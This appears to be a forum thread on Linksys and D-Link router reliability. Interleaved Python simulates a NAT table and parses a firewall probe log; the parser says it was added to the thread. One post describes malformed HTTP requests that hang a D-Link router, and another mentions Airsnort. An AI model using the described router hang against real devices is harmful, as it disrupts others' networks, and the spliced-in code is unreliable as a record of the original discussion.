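        stale = [f for f, (_, seen) in self.entries.items()
                 if now - seen > self.idle_timeout]
        for f in stale:
            del self.entries[f]

    def outbound(self, flow, now):
        """Return the external port for this packet, or None if no slot is free."""
        self._expire(now)
        entry = self.entries.get(flow)
        if entry:                # existing session: refresh the timer, reuse the slot
            entry[1] = now
            return entry[0]
        if len(self.entries) >= self.capacity:
            self.dropped += 1
            return None
        port, self.next_port = self.next_port, self.next_port + 1
        self.entries[flow] = [port, now]
        return port

def flow(src_port, dst="203.0.113.5", dst_port=53):
    return ("udp", "192.168.1.100", src_port, dst, dst_port)

def one_flow_many_packets(n=10000):
    nat = NatTable()
    for i in range(n):
        nat.outbound(flow(5000), now=i * 0.001)
    return len(nat.entries)

def many_flows(n=12):
    nat = NatTable()
    for i in range(n):
        nat.outbound(flow(5000 + i), now=0)
    return len(nat.entries), nat.dropped

def recovers_after_timeout():
    nat = NatTable()
    for i in range(8):
        nat.outbound(flow(5000 + i), now=0)
    return nat.outbound(flow(6000), now=31) is not None
```

Packet volume on one session never grows the table; only the number of concurrent sessions and how quickly idle entries expire determine when new mappings are refused.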
It also CORRUPTS data within the network. I was running apache on my system and when I accessed it with loopback (or from any other computer on the network), the pages would come back garbled in some way half the time. It did this for people outside the network too on early versions of firmware, but they fixed the outside problem. I guess they didn't bother to check inside. When I plugged the system straight into the modem, problems disappeared.
After getting no support (box says '24/7'...I tried 8 times for a total of 16 hours worth of being put on hold) and no returned emails, I kicked this piece of shit to the curb and bought a Netgear.
Haven't had a problem since. Spend the extra $20 and buy a Netgear.
Maybe they had a bad run of the things early on? I got mine a few months after they first appeared (March 2000 I think was the original firmware date). It wouldn't surprise me if they cut corners to keep them $20 under competitors.
Here is some of my firewall data that was captured yesterday. The attacker attempts a UDP port probe and then launches ICMP unreachable storms against the router in an attempt to create a DoS.
I did have remote management turned off (thank goodness). I did notice a series of slowness, but that was wacked after I refreshed my IP.
Notice the repetitive addresses.
Time, Event, Intruder, Count
11/06/2002 11:03:13 AM, ICMP unreachable storm, 80.146.102.92, 1
11/06/2002 11:03:11 AM, ICMP unreachable storm, 80.143.254.46, 1
11/06/2002 11:03:11 AM, UDP port probe, h24n2fls33o985.telia.com, 47
11/06/2002 11:03:10 AM, ICMP unreachable storm, h24n2fls33o985.telia.com, 1
11/06/2002 11:03:10 AM, UDP port probe, h24n2fls33o985.telia.com, 36
11/06/2002 11:03:09 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 2
11/06/2002 11:03:09 AM, UDP port probe, h24n2fls33o985.telia.com, 5
11/06/2002 11:03:09 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:09 AM, UDP port probe, h24n2fls33o985.telia.com, 2
11/06/2002 11:03:08 AM, ICMP unreachable storm, 147.102.101.42, 1
11/06/2002 11:03:08 AM, UDP port probe, 0.0.0.0, 30
11/06/2002 11:03:08 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 5
11/06/2002 11:03:08 AM, UDP port probe, 24.130.165.71, 4
11/06/2002 11:03:08 AM, UDP port probe, 0.0.0.0, 16
11/06/2002 11:03:08 AM, ICMP unreachable storm, 61.10.170.189, 1
11/06/2002 11:03:08 AM, UDP port probe, 172.176.252.14, 1
11/06/2002 11:03:08 AM, UDP port probe, 24.130.165.71, 10
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 8
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 7
11/06/2002 11:03:07 AM, UDP port probe, cpe-24-160-6-98.sw.rr.com, 6
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 9
11/06/2002 11:03:07 AM, ICMP unreachable storm, 24.130.165.71, 1
11/06/2002 11:03:07 AM, UDP port probe, 24.130.165.71, 3
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 8
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:07 AM, UDP port probe, 24.130.165.71, 1
11/06/2002 11:03:07 AM, UDP port probe, ppp-217-133-201-254.dialup.tiscali.it, 1
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 4
11/06/2002 11:03:06 AM, UDP port probe, 24.160.6.98, 7
11/06/2002 11:03:06 AM, UDP port probe, 61.21.137.163, 6
11/06/2002 11:03:06 AM, UDP port probe, 24.160.6.98, 5
11/06/2002 11:03:06 AM, UDP port probe, 24.130.165.71, 4
11/06/2002 11:03:06 AM, UDP port probe, 68.81.7.227, 3
11/06/2002 11:03:06 AM, ICMP unreachable storm,
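One way to pull the repeated sources out of a log in this "Time, Event, Intruder, Count" layout, as an added example that is not part of the original post. The sample rows and addresses are constructed (documentation ranges), and treating the Count column as events per row is an assumption; the cut-off final row mirrors the truncated last line of the log above.

```python
import csv
from collections import defaultdict
from datetime import datetime

# Constructed sample in the same column layout as the posted log.
SAMPLE_LOG = """\
Time, Event, Intruder, Count
11/06/2002 11:03:13 AM, ICMP unreachable storm, 192.0.2.10, 1
11/06/2002 11:03:11 AM, UDP port probe, host-a.example.net, 47
11/06/2002 11:03:10 AM, ICMP unreachable storm, host-a.example.net, 1
11/06/2002 11:03:10 AM, UDP port probe, host-a.example.net, 36
11/06/2002 11:03:09 AM, UDP port probe, 198.51.100.7, 2
11/06/2002 11:03:08 AM, UDP port probe, 0.0.0.0, 30
11/06/2002 11:03:08 AM, UDP port probe, 198.51.100.7, 5
11/06/2002 11:03:07 AM, UDP port probe, 0.0.0.0, 9
11/06/2002 11:03:06 AM, ICMP unreachable storm,
"""

def parse_log(text):
    """Yield (timestamp, event, source, count); skip the header and cut-off rows."""
    for row in csv.reader(text.splitlines(), skipinitialspace=True):
        if len(row) != 4 or not row[2].strip() or not row[3].strip().isdigit():
            continue  # header, blank line, or truncated record
        ts = datetime.strptime(row[0].strip(), "%m/%d/%Y %I:%M:%S %p")
        yield ts, row[1].strip(), row[2].strip(), int(row[3])

def summarize(text):
    """Per source: summed count, distinct event types, distinct seconds seen."""
    stats = defaultdict(lambda: {"total": 0, "events": set(), "times": set()})
    for ts, event, source, count in parse_log(text):
        entry = stats[source]
        entry["total"] += count
        entry["events"].add(event)
        entry["times"].add(ts)
    return stats

def repeat_offenders(text, min_total=20):
    """Sources whose summed count reaches min_total, noisiest first."""
    hits = [(src, s["total"], sorted(s["events"]), len(s["times"]))
            for src, s in summarize(text).items() if s["total"] >= min_total]
    return sorted(hits, key=lambda h: -h[1])

if __name__ == "__main__":
    for src, total, events, seconds in repeat_offenders(SAMPLE_LOG):
        note = " (unspecified source address)" if src == "0.0.0.0" else ""
        print(f"{src}: count {total} across {seconds}s; {', '.join(events)}{note}")
```

A source that appears under both event types within the same few seconds, or rows attributed to 0.0.0.0, are the entries worth checking first against the router's remote-management and firmware settings.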
Linksys has great products....
But some like the BEFW11P1 need some help to prevent that awful crash that occurs under high load.
See:
http://www.dslreports.com/forum/remark,4453971~root=equip,16~mode=flat
All good for me. I have the BEFSR41 and the wireless version and they both work great. One thing I had a small problem with was getting encryption to work on the wireless. I was running NT and added the adapter from within the network settings which made it work, but only running the setup wizard gives you the program to set the WEP keys. Now it runs 128 bit (actually 104) like a champ.
As for the card, I have the plain little Linksys wifi PCMCIA and it works great in NT and FreeBSD. BSD took a little playing with the pccard.conf - you have to change the section title to the exact card name read on boot - it appears in your /var/log/messages I believe.
My next wireless nic will be the Orinoco gold because you can attach an external antenna to it (Pringles anyone?) and Airsnort works with it.
As for their other products, I have installed a couple of the cheap little switches they make for clients with no complaints, either.
One weird thing that happened a few weeks ago was the non-wireless version would not let me ping through to the cable modem for some reason. I ended up resetting to factory defaults and it cleared up. No biggie, though.
Time to set up 486 securely: 1 hr. - several days.
Not everyone knows how to set up a linux router securely. Some people might think they do, but they could be wrong. According to who? Not that you're wrong, but you cite no facts. It seems like it is just your opinion.
Ok, I admit. I did post my opinion, which is based upon experience both with the router in question, and several NAT boxes I've setup using old peecees and iptables. I base my statement on security on the returns I get when I nmap one of my NAT boxes versus the linky router I use at home. Five million versus fourteen (not thousand or million, just 14). And yes, I do patch all of the hardware I have to take care of. :)
So, opinion, yes, based on experience, yes as well. One side issue: It's a hell of a lot harder for a student to walk out of a lab unnoticed with a 486 (assuming that student would even want to do so which seems unlikely to me) versus slipping a BESFR41 into his backpack. So there's that layer of security as well... although that same student would probably swipe the switch now that I think of it
political_news.c: warning: comparison is always true due to limited range of data type
A similar problem exists on the D-Link DI-704P router/firewall. Essentially, any http request not formatted exactly as the router expects causes the router to stop handling packets for several minutes. I reported this bug to D-Link, but was told the problem does not exist, despite the fact that other people were able to recreate the problem! KDE Bug #40538 has the details as the Konqueror browser triggers the problem.
Come test your mettle in the world of Alter Aeon!
Granted, there doesn't appear to be anything of real value there now, but that may change now that OpenNIC is available to every Linksys customer out there.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
...but my ISP DOS'es me more than any script kiddie could ever hope to.
YooHoo/2U2
Can be found here. Sorry if this duplicates anyone else's post. I don't have time to read everything.
-Guanno
Space & noise. And set up. And redundancy. We already use Linux servers to provide DNS & file sharing. I suppose we could just pile it all on one Linux box, but if we did that, the Linux server is just one more single point of failure. We use jet directs, too, and we could run that off the Linux server if we wanted to...but if the server crashes, we still have Internet & printing, if the Linksys crashes, a simple line change on the server activates DHCP and we're still up internally, although we have no Internet...you get the picture. Short version, we're on a budget and we don't want a pile of power-hungry computers when a little Linksys does what we want to, and quite nicely. And, in a pinch, we could always fire up the proxy functions of the server. Hasn't happened yet, though. We've had server hard drives die, but we've never had a Linksys fail in the lab - although one or two have been DOA.